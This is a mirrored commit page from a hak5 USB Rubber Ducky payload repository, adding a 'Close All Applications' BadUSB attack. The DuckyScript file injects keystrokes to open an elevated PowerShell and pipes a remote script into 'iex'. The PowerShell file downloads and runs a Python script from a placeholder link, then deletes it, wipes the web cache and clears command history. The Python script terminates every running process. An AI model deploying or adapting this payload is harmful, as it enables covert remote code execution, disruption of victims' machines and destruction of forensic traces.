hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #213 from aleff-github/patch-7 

Close All Applications In Windows - Plug And Play
pull/243/head
Dallas Winger 2023-03-03 11:36:03 -05:00 committed by GitHub
parent 3afa5936bb 2303cb5988
commit a7ef2b2882
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 102 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
payloads/library/execution/CloseAllApplicationsInWindows/README.md Normal file
View File

@ -0,0 +1,28 @@
# Close All Applications - BADUSB ✅
A script used to close all target open applications.
🟢 **Plug-And-Play** 🟢
**Category**: Execution
## Description
A script used to close all target open applications.
Opens PowerShell hidden, download a Python script, execute it, remove Python script downloaded, delete powershell history.
## Getting Started
### Dependencies
* Internet Connection
* Windows 10,11
### Executing program
* Plug in your device
### Settings
- No settings - Plug-And-Play

18
payloads/library/execution/CloseAllApplicationsInWindows/close_all_app.ps1 Normal file
View File

@ -0,0 +1,18 @@
# Download Python script
# Reply $scriptUrl with YOUR LINK. The Payload should be script.py
$scriptUrl = "YOUR_END_USER_LINK_WITH_PAYLOAD"
$savePath = "$env:temp\script.py"
(New-Object System.Net.WebClient).DownloadFile($scriptUrl, $savePath)
# Execute Python script
& python $savePath
# Delete the downloaded script
Remove-Item $savePath
# Clear the download history from the system's web cache
Remove-Item -Path "$env:LOCALAPPDATA\Microsoft\Windows\WebCache\*" -Recurse -Force
# Clear the PowerShell command history
Clear-History

44
payloads/library/execution/CloseAllApplicationsInWindows/payload.txt Normal file
View File

@ -0,0 +1,44 @@
REM #####################################################
REM # |
REM # Title : Close All Applications |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################################
REM Plug-And-Play
REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHEL_CODE example.com
DELAY 2000
GUI x
DELAY 250
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
DELAY 1000
TAB
TAB
ENTER
DELAY 2000
STRING irm POWERSHEL_CODE | iex
ENTER

12
payloads/library/execution/CloseAllApplicationsInWindows/script.py Normal file
View File

@ -0,0 +1,12 @@
try:
import psutil
except:
import os
os.system("pip install psutil")
import psutil
for process in psutil.process_iter():
try:
process.terminate()
except:
pass